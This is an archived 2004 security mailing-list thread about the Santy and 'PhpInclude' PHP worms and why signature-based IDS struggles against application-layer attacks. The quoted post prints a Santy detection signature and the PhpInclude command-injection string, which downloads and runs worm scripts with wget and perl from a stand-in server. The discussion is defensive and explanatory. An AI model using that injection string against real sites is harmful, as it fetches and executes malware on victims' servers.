Home page logo

webappsec logo WebApp Sec mailing list archives

RE: The Santy worm and Application Security
From: "xxradar" <xxradar () radarhack com>
Date: Tue, 28 Dec 2004 17:48:09 +0100

Hi all,
I was experimenting with an Application layer firewall, called Intelliwall
from http://www.bee-ware.net. The fw successfully detected earlier PHP
scanning activity and also successfully detected the santy worm whithout
pattern updates or whitelist configuration. The detection mechanism is based
on neural network technology and works astonishing well.  


-----Original Message-----
From: Ofer Shezaf [mailto:Ofer.Shezaf () breach com] 
Sent: Monday, December 27, 2004 6:41 PM
To: webappsec () securityfocus com
Subject: The Santy worm and Application Security

Hi All,

As an application security professional I've always been frustrated, as
I'm sure many of you have been, with the lack of understanding of
application security among IT professionals. Many think that solving
application security issues only requires an IPS/IDS, VA and patching.
Only a few out there really understand the depth of the problem as
presented in the OWASP top 10.

The Santy worm is a turning point in this respect. As Santy and
"PhpInclude", its successor, are application layer attacks ("PHP
injection" and "command injection" respectively) they stretch signature
based technology to its limits and require signatures that are easy to
evade and are prone to generate false positives.

Just think how many different ways the Santy attack vector used as a
snort signature <<<'&highlight=%2527%252Esystem('>>> can be modified to
evade an IDS (manually or automatically).

"PhpInclude" is even more interesting as it does not address a specific
vulnerability but tries to exploit a known flawed technique used to
write PHP code. It tries to change arbitrary parameters of a PHP script
to a command injection string, expecting that in some cases these
parameters will be used in a PHP include statement. It is probably the
first worm to exploit a OWASP top 10 security problem and not a specific

The "phpInclude" attack vector is varying but has the general form
<<<cmd=cd /tmp;wget *server*/spybot.txt;wget *server*/worm1.txt; perl
worm1.txt>>>. A signature based system may look for the signatures such
as "perl", "cmd" or "wget" but they are way too short and simplistic to
evade false positives.

"Santy" and "phpInclude" emphasize the need for real application
security measurements such as code review, application layer scanning
and real time application layer security. 

An interesting solution for real time protection is application layer
signatures. Such signatures predict better application layer attacks. To
do so they have to be contextual (i.e. confined to field values),
normalized and correlated to other attack indicators such as abnormal
behavior or multiple signature match during the session's requests and

While I'm not writing this all as a marketing pitch, some of these ideas
are implemented in my company's products ;-) I'd be happy to hear what
the other pros here have to say about this.

~ Ofer

Ofer Shezaf, CTO 
Breach Security, Inc. 
Deployable Application Security 

Tel: +972.9.956.0036 ext.212
Cell: +972.54.443.1119
ofers () breach com

No virus found in this incoming message.
Checked by AVG Anti-Virus.
Version: 7.0.296 / Virus Database: 265.6.5 - Release Date: 12/26/2004

No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.296 / Virus Database: 265.6.5 - Release Date: 12/26/2004

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]